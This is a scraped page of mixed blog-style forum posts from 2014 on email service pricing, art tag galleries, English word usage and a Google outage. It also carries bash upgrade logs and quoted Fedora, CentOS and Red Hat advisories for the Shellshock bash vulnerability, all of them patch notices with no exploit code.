首頁 美術繪圖 | 美術設計 | 熱門標籤 | 首選 | 首頁宣傳 | 近期作品 論壇: 發表 | 美術工作 | 美術比賽 | 展覽活動 | 美術相關 | 一般討論 | 美術同好 CG 討論 :: Photoshop | Painter | 3D 行動 | AMP

【 立即註冊 】 : 更改個人資料 : : 登入

會員名稱: 登入密碼: 保持登入
Type(Type) 所有的發表文章

前往頁面 ←上一頁  1 ... 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 ... 559  下一頁→

[h1]E-Mail 郵件寄送服務業者整理 (2014 Oct)[/h1]

這邊用低用量(每天 1K ~ 2K 的信件,每月 30K ~ 60K)來做粗略的估算!
請自行到官方網址參閱細節。

[h1]AWS SES Services (No Free, $0.13/K)[/h1]
@ http://aws.amazon.com/en/ses/pricing/

=> AWS 無免費額度, 1K == $0.1 USD + Bandwidth 另外計算(同 EC2

=> 假設平均一封信 128KB(含 Mail Header + 附件), 128KB * 1K = 128MB

EC2 1GB xfer = $0.12 USD, 則 128/1024 * $0.12 * 2 == $0.03

這裡「乘以二 (*2)」包含
(a) 附件 (attachment)
(b) 頻寬 (xfer out bandwidth)

除非你的信都很大,又夾帶附件等等,否則 EC2 Xfer Out 費用「理論上」大概是 +30% 左右,
也就是 1K == $0.10 + $0.03 == $0.13 USD

AWS Xfer In 本來就是免費。


[h1]ManDrill Mail Delivery Service (12K Free, $0.2/K)[/h1]

@ http://www.mandrill.com/pricing/
=> Man Drill 有 12K messages 免費
=> 之後每 1K == $0.2 USD (12K ~ 1M messages)


[h1]SendGrid Mail Delivery Service (No Free, $0.25/K)[/h1]

@ http://sendgrid.com/transactional-email/pricing

=> Send Grid 無免費額度
=> 最便宜的方案是 40K == $9.95,約 1K == $0.24875


[h1]SoftLayer E-Mail Delivery Service (25K Free, $1/K if 25K+)[/h1]

@ http://www.softlayer.com/email-delivery

=> Softlayer 有免費額度 25K
=> 超過 25K 之後,每 1K == $1 USD (而且他似乎是 SendGrid 的大房東?

[h1]MailJet Mail Delivery Service (12K Free, $0.25K)[/h1]

@ https://www.mailjet.com/pricing/v3

=> Mail Jet 每月 12K messages 免費
=> 但是 30K 的方案,每個月要 $7.49 USD,約等於 1K == $0.25

[h1]TurboSMTP EMail Service (No Free, $0.3/K)[/h1]

@ https://serversmtp.com/en/cart.php?systpl=turbo-smtp

=> TurboSMTP 沒有免費方案,約 1K == $0.3 USD

=> 有類似「預付卡(非月租)」的方案,約 1K == $1.5 USD (無日期限制)
(2014-10-13 22:38)

[center]Hug Art[/center]
##DIV##
[center]
[h1]「擁抱」插畫 「抱」相關繪圖設計美術 - Hug Related Drawing Fine Art[/h1]
擁抱-800-眼鏡 擁抱... - Hug
7s A big hug - Bribe
熊 抱我好嗎? - Hug me, please
thanksgiving2 溫暖的擁抱 - A warm hug
IMG_20140315_155326 不敢擁抱你 - Cat hug
HUG_Final 《擁抱》 - Hug Final
天使03 天使的擁抱 - Angel's Hug
coldhug 冷抱:大概發生在清晨 - Cold Hug
[hr]
See Also:
[url=http://vovo2000.com/tags/抱/]
「抱」相關創作 :: "Hug" Related Fine Art
[/url]


「Hug」相關美術 :: "Hug" Related Painting/Drawing/Fine Art



「親吻 Kiss」相關創作 :: "Kiss" Art Artworks Creation


[url=http://vovo2000.com/tags/微笑/]
「微笑」相關創作 :: "Smile" Art Artworks Creation
[/url]



[/center](2014-10-12 23:48)

[h1]最後/最終: Ultimately, Eventually, Finally, At Last, In the End 的用法、比較、意思與程度差別[/h1]



(1) 觀察到過程很長,有一定時間/延遲、「不是突然到最後」: Eventually, At Last, Finally

(2) 用法較為中性、第三者角度: Ultimately, In the End

(3) 過程有掙扎、努力過程、有鬆一口氣的感覺: Finally, At Last

(4) 意思相近 #1: Finally, At Last 這兩者意思相近

(5) 意思相近 #2: Ultimately, In the End 這兩者意思相近

(6) Eventually 有時代表一小段落告終,但並非最終的結束。


Last Friends
最後的朋友 Last Friends
(2014-10-07 22:55)

[h1]也許:Maybe vs. Perhaps vs. Possibly 的用法、差別、意思比較[/h1]


Maybe: 較為口語用法。

e.g. Maybe I would attend the dinner party with you.


Perhaps: 用法較為中性,比起 Maybe 更為正式一點。

e.g. I got about 2500 comic books collection, well, perhaps more than 3000.


Possibly: 比起 maybe/perhaps 更為正式。

e.g. If you have time, I think you possibly would like to interview with her.


簡單說: 口語化 <--- Maybe, Perhaps, Possibly ---> 正式


@ See also: "Likely, Probable, Possible" 的意思比較




(2014-10-07 21:49)

[h1]可能:Possible vs. Likely vs. Probable 的用法、比較、意思與程度差別[/h1]


Possible(possibly) => 是指「可能」,但是「機率」不一定,可能機率很高,可能機率很低,要看狀況。

Likely => 是指「極可能」「非常可能」,實現的「機率」很高。

Probable(probably) => 和 Likely 意思相近,


簡單說,

(1) 當你說 「Likely or Probable/Probably」,就是「高機率的可能」「極可能」

(2) 當你說 「Possible or Possibly」,就是「可能發生,但是機率不確定」,要用前後文來判斷。



@ See also: "Maybe, Perhaps, Possibly" 的比較

(2014-10-07 21:47)

[center]Iron Fans[/center]
##DIV##
[center]
[h1]「扇」插畫 & 「鐵扇創作」相關繪圖設計美術 - Fab & Iron Fan Princess FineArt[/h1]
文化祭_扇 文化祭_扇 - "Fan" Artworks Design
鐵扇女皇 中國神話系列:鐵扇女皇 - Iron Fan Queen
鐵扇公主 鐵扇公主 - Iron Fan Princess
anglea08 黑風寨夫人 - Black Wind Village Lady
336拷貝 舞扇的舞者 - Fan Dancer
梅花扇桌布 梅花團扇 - Plum round fan
夏日祭典 夏日祭典 - Summer Festival
1211065_orig 鐵扇公主 - Iron Fan Princess
人物設計20120726(small) 黑羽扇 - Black feathers Fan
[hr]
See Also:
[url=http://vovo2000.com/tags/扇/]
「鐵扇/扇/扇子」相關創作 :: "Fan" Related Fine Art
[/url]

[url=http://vovo2000.com/tags/西遊/]
「西遊」相關美術 :: "Journey to the West" Related Painting/Drawing/Fine Art
[/url]

[url=http://vovo2000.com/tags/牛/]
「牛」相關創作 :: "Bull/Ox" Art Artworks Creation
[/url]

[url=http://vovo2000.com/tags/公主/]
「公主」相關創作 :: The "Princess" Related Illustration/Painting
[/url]

[url=http://vovo2000.com/tags/悟空/]
「悟空」相關創作 :: "Sun Wukong" Related Art Creations
[/url]


[/center](2014-10-05 10:56)

[h1]Simulation 和 Emulation 的差別[/h1]

中文都叫做模擬/模擬器,但是英文的實際意義略有不同。

1. 中文翻譯

Simuation/Simulator: 模擬/模擬器
Emulation/Emulator: 仿真/模擬器

2. 範圍

Simuation/Simulator: 部分或完整的架構
Emulation/Emulator: 完整的架構

3. 效能

Simuation/Simulator: 部分或完整的效能
Emulation/Emulator: 完整的效能

4. 內部/外部

Simuation/Simulator: 強調內部的機制要部分或全部仿照原始標的。
Emulation/Emulator: 強調外部功能一樣即可,內部狀態不管。


5. 實際應用

Simuation/Simulator: 用來「分析、測試、研究、感受」某個現有機制 e.g. 飛行模擬器
Emulation/Emulator: 用來「實際取代」某個現有的機制 e.g. FC/SFC 模擬器
(2014-10-01 21:03)

[h1]Google 全面當機/錯誤: "Error 500 (伺服器錯誤)!!1" @ 2014/09/28 18:00+ (CST)[/h1]



Google 大約於 2014/09/28 CST (GMT+0800) 18:00 時「全面發生錯誤」

這段期間除了 Google Search,其他 Google Apps 都是各種錯
(大部分為 500 internal server error,少部分是 404 not found)

Update: 持續時間約 20~30 分鐘, 2014/09/28 18:30 (TW time)似乎逐漸回復。



(1) Google Search => 正常(好像只有 Google 搜尋正常!)

(2) Gmail => Internal Server Error (HTTP 500 Error)

(3) Google Docs / Google Drive => Internal Server Error (HTTP 500 Error)

(4) Google Plus / Google+ => 發生錯誤,請稍後再試。 That’s all we know. (一樣是 HTTP 500)

(5) Google Adsense / Analytics => HTTP 404 Not Found 或者無法連上



但是 Google Apps Status 狀態看起來都是正常。
=> #hl=zh-TW&v=status">http://www.google.com/appsstatus#hl=zh-TW&v=status



這段期間抓的 CURL(不過是在美國主機抓的)

[h1]$ curl -v https://www.google.com/analytics/web/?hl=zh-TW[/h1]
代碼:

* About to connect() to www.google.com port 443 (#0)
*   Trying 74.125.239.115... connected
* successfully set certificate verify locations:
*   CAfile: none
  CApath: /etc/ssl/certs
* SSLv3, TLS handshake, Client hello (1):
* SSLv3, TLS handshake, Server hello (2):
* SSLv3, TLS handshake, CERT (11):
* SSLv3, TLS handshake, Server key exchange (12):
* SSLv3, TLS handshake, Server finished (14):
* SSLv3, TLS handshake, Client key exchange (16):
* SSLv3, TLS change cipher, Client hello (1):
* SSLv3, TLS handshake, Finished (20):
* SSLv3, TLS change cipher, Client hello (1):
* SSLv3, TLS handshake, Finished (20):
* SSL connection using ECDHE-RSA-AES128-SHA
* Server certificate:
*        subject: C=US; ST=California; L=Mountain View; O=Google Inc; CN=www.google.com
*        start date: 2014-09-10 13:49:36 GMT
*        expire date: 2014-12-09 00:00:00 GMT
*        subjectAltName: www.google.com matched
*        issuer: C=US; O=Google Inc; CN=Google Internet Authority G2
*        SSL certificate verify ok.
> GET /analytics/web/?hl=zh-TW HTTP/1.1
> User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
> Host: www.google.com
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: text/html
< Date: Sun, 28 Sep 2014 10:20:45 GMT
< Expires: Sun, 28 Sep 2014 10:20:45 GMT
< Cache-Control: private, max-age=0
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< X-XSS-Protection: 1; mode=block
< Server: GSE
< Alternate-Protocol: 443:quic,p=0.01
< Transfer-Encoding: chunked
<
* Connection #0 to host www.google.com left intact
* Closing connection #0
* SSLv3, TLS alert, Client hello (1):
<html><head></head><body><script type="application/javascript" language="javascript">  var url = "https://accounts.google.com/ServiceLogin?service=analytics&continue=https://www.google.com/analytics/web/?hl%3Dzh-TW___HASH___&followup=https://www.google.com/analytics/web/?hl%3Dzh-TW___HASH___";  if (self.document.location.hash) {    url = url.replace(/___HASH___/g,        encodeURIComponent(self.document.location.hash));  } else {    url = url.replace(/___HASH___/g, "");  }  window.location.assign(url);</script></body></html>

(2014-09-28 18:28)

[center]BattleField & Wars[/center]
##DIV##
[center]
[h1]「戰場」 & 「戰爭」相關插畫設計繪圖 - BattleField & Wars Illustraion/Drawing Art[/h1]
機械女-1_004 機械戰爭 - Machine Wars Girl
戰43(700) 戰爭女神 - The Goddess of Battle
戰場 <戰場> - Battlefield of Centaur
GI-JOE-2-1000 特種部隊:眼鏡蛇的崛起 - The Rise of Cobra FanArt
立花誾千代 立花誾千代 - Tachibana Ginchiyo
Mission start Mission start - BattleField
asdasd 概念-動態 - Battlefield Robots
ghost5_post_cover_m_BcNy 明日工作室小說:黃泉委託人5 血戰場 封面插畫
戰場婚禮 戰場婚禮 - Battlefield Wedding
Shandya-(Fantasy-8 Phoenix Battle Field
戰死 戰死-戰場 - Fight to Death
開戰時刻 開戰時刻!! - The War Begins
dtyj 前線戰爭 - Frontline Battlefield
Monde Magique 1 魔法戰爭 - Monde Magique
非洲軍團 上傳 德意志非洲軍團 - Afrika Korps
小田原之戰 拷貝 小田原之戰 - Siege of Odawara
[hr]
See Also:

「War」相關創作 :: "War" Related Drawing/Creation


[url=http://vovo2000.com/tags/和平/]
「和平」相關創作 :: "Peace" Related Painting/Drawing/Fine Art
[/url]

[url=http://vovo2000.com/tags/戰場/]
「戰場」相關創作 :: "Battlefield" Art Artworks Creation
[/url]

[url=http://vovo2000.com/tags/戰爭/]
「戰爭」相關創作 :: The "War" Related Illustration/Painting
[/url]

[url=http://vovo2000.com/tags/武器/]
「武器」相關創作 :: "Weapons" Related Art Creations
[/url]


[/center](2014-09-28 17:00)

[h1]bash update 09/28[/h1]

代碼:

$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
  bash
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 576 kB of archives.
After this operation, 8192 B of additional disk space will be used.
Do you want to continue? [Y/n] y
Preparing to unpack .../bash_4.3-7ubuntu1.4_amd64.deb ...
Unpacking bash (4.3-7ubuntu1.4) over (4.3-7ubuntu1.3) ...
Processing triggers for man-db (2.6.7.1-1) ...
Processing triggers for install-info (5.2.0.dfsg.1-2) ...
Setting up bash (4.3-7ubuntu1.4) ...
update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode

$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1021112  Sep 27 16:04 /bin/bash

$ md5sum /bin/bash
b81de36b3ef3bb64229833c055560c0f  /bin/bash

$ bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

(2014-09-28 10:24)

[h1]飲酒運転 ダメよ〜 ダメダメ[/h1]


公路喝酒不開車 LED 的梗是致敬
「日本エレキテル連合(女子搞笑組合)」的「未亡人朱美 機器人」

日本エレキテル連合

https://www.youtube.com/watch?v=ee_9R77MfpU
[影片/動畫]

(2014-09-28 00:07)

[h1]Ubuntu 10.04/12.04/14.04 有新的更新[/h1]

代碼:


$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash

$ md5sum /bin/bash
d63ff62f142e76205e89e4a4de553fec  /bin/bash

$ apt-get upgrade
[14:38] > apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
  bash grub-common
2 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 2,715 kB of archives.
After this operation, 0 B of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://archive.ubuntu.com/ubuntu/ precise-updates/main bash amd64 4.2-2ubuntu2.3 [641 kB]
Get:2 http://archive.ubuntu.com/ubuntu/ precise-updates/main grub-common amd64 1.99-21ubuntu3.17 [2,074 kB]
Fetched 2,715 kB in 2s (1,129 kB/s)
(Reading database ... 29737 files and directories currently installed.)
Preparing to replace bash 4.2-2ubuntu2.2 (using .../bash_4.2-2ubuntu2.3_amd64.deb) ...
Unpacking replacement bash ...
Processing triggers for man-db ...
Setting up bash (4.2-2ubuntu2.3) ...
update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode.
(Reading database ... 29737 files and directories currently installed.)
Preparing to replace grub-common 1.99-21ubuntu3.16 (using .../grub-common_1.99-21ubuntu3.17_amd64.deb) ...
Unpacking replacement grub-common ...
Processing triggers for ureadahead ...
Processing triggers for man-db ...
Setting up grub-common (1.99-21ubuntu3.17) ...


$  ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 25 14:50 /bin/bash




$ md5sum /bin/bash
5ee533c7cd3a8246b4a3d7a29ffbe0b2 /bin/bash (Ubuntu 12.04 LTS x86_64 bash)

$ md5sum /bin/bash
eb8a956c0a1164b84262505a629e8a1f /bin/bash (Ubuntu 14.04 LTS x86_64 bash)(2014-09-27 14:40)

[h1]Related ShellShock References[/h1]
(2014-09-27 14:33)

[h1]Fedora Bash Update: Fedora 19, Fedora 20[/h1]

From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19
Date: Fri, 26 Sep 2014 09:00:48 +0000
Message-ID: <20140926090050.9FE1722338@bastion01.phx2.fedoraproject.org>
--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11514
2014-09-26 08:10:17
--------------------------------------------------------------------------------

Name : bash
Product : Fedora 19
Version : 4.2.48
Release : 2.fc19
URL : http://www.gnu.org/software/bash
Summary : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.

--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169
Resolves: #1146319
+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Inhibit code injection - patch by Stephane Chazelas
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.47-1
- Patchlevel 47
* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

[ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment
(Incomplete fix for CVE-2014-6271)
https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program. Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key. More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
Date: Fri, 26 Sep 2014 09:03:00 +0000
Message-ID: <20140926090302.6FC4121113@bastion01.phx2.fedoraproject.org>
--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11527
2014-09-26 08:10:45
--------------------------------------------------------------------------------

Name : bash
Product : Fedora 20
Version : 4.2.48
Release : 2.fc20
URL : http://www.gnu.org/software/bash
Summary : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.

--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169
Resolves: #1146319
+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-4
- Inhibit code injection - patch by Stephane Chazelas
* Mon Jul 21 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-3
- Mention ulimit -c and -f block size in POSIX mode
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Proper patchlevel 47
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-1
- Patchlevel 47
* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

[ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment
(Incomplete fix for CVE-2014-6271)
https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program. Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key. More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

[h1]CentOS 5 / CentOS 6 / CentOS 7[/h1]
From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 5 bash Security Update
Date: Fri, 26 Sep 2014 02:16:02 +0000
Message-ID: <20140926021602.GA3213@chakra.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
9755e86ad8536c908f95340be308190b52989bfa0d9268a461c40a3f0d493bc7 bash-3.2-33.el5_10.4.i386.rpm

x86_64:
b1e14edd0d675c6fb0be64cb875fbd9fac208a58e427ea32f373c9359b35642c bash-3.2-33.el5_10.4.x86_64.rpm

Source:
b71bd90354d2724f256f9f23e113eea89c98b3ce923380657461cb78d34ab8da bash-3.2-33.el5_10.4.src.rpm



--
Johnny Hughes
CentOS Project { http://www.centos.org/ }
irc: hughesjr, #centos@irc.freenode.net


From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 6 bash Security Update
Date: Fri, 26 Sep 2014 02:24:20 +0000
Message-ID: <20140926022420.GA62097@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
28a674dd09ca395b3021749ebf8928806ae981a325c02b8ead070e75cdae2cab bash-4.1.2-15.el6_5.2.i686.rpm
333f57db85ea63636650d1b491c07a5d0ccb722e9353db5f22a62685d96c9da7
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
72fb8fa60fce9ccd1f221ace44d7a29870856d9033819d2c3e75885881cf6a4a
bash-4.1.2-15.el6_5.2.x86_64.rpm
18cde2ec120c8d351c60ae3901bb6706f4c97abbf2b87cdec5ed1ba4175c84a2
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Source:
d0a8f52d7db4c729c17188a2bd690aff2371f8ac86900dabb14b0df5aa1ff6a5 bash-4.1.2-15.el6_5.2.src.rpm

From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 7 bash Security Update
Date: Fri, 26 Sep 2014 02:23:24 +0000
Message-ID: <20140926022324.GA61885@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

x86_64:
d2806c39117791707b6f528afd2bfa35b20a67f6ad40231057d6dd27f4eb7e36
bash-4.2.45-5.el7_0.4.x86_64.rpm
9a66662961d2a359b71387436b03e1e951473b10dbf450e480c6787d584dc70e
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Source:
b37570f9434b82c9f2df7920b1ab94e00039370b58ee1ab2c2235eeda53b88fb bash-4.2.45-5.el7_0.4.src.rpm


[h1]Red Hat v5, Red Hat v6, Red Hat v7 BASH Update[/h1]

From: bugzilla@redhat.com
To: rhsa-announce@redhat.com, enterprise-watch-list@redhat.com
Subject: [RHSA-2014:1306-01] Important: bash security update
Date: Fri, 26 Sep 2014 02:02:30 +0000
Message-ID: <201409260154.s8Q1s9AP014275@int-mx13.intmail.prod.int.phx2.redhat.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
Red Hat Security Advisory

Synopsis: Important: bash security update
Advisory ID: RHSA-2014:1306-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1306.html

Issue date: 2014-09-26
CVE Names: CVE-2014-7169
=====================================================================

1. Summary:

Updated bash packages that fix one security issue are now available for Red
Hat Enterprise Linux 5, 6, and 7.

Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The GNU Bourne Again shell (Bash) is a shell and command language
interpreter compatible with the Bourne shell (sh). Bash is the default
shell for Red Hat Enterprise Linux.

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

Applications which directly create bash functions as environment variables
need to be made aware of changes to the way names are handled by this
update. For more information see the Knowledgebase article at
https://access.redhat.com/articles/1200223


Note: Docker users are advised to use "yum update" within their containers,
and to commit the resulting changes.

For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the
aforementioned Knowledgebase article.

All bash users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258


5. Bugs fixed ( https://bugzilla.redhat.com/):

1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for
CVE-2014-6271)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux (v. 5 server):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

ia64:
bash-3.2-33.el5_11.4.i386.rpm
bash-3.2-33.el5_11.4.ia64.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.ia64.rpm

ppc:
bash-3.2-33.el5_11.4.ppc.rpm
bash-debuginfo-3.2-33.el5_11.4.ppc.rpm

s390x:
bash-3.2-33.el5_11.4.s390x.rpm
bash-debuginfo-3.2-33.el5_11.4.s390x.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-4.1.2-15.el6_5.2.ppc64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-4.1.2-15.el6_5.2.s390x.rpm
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm
bash-doc-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm
bash-doc-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
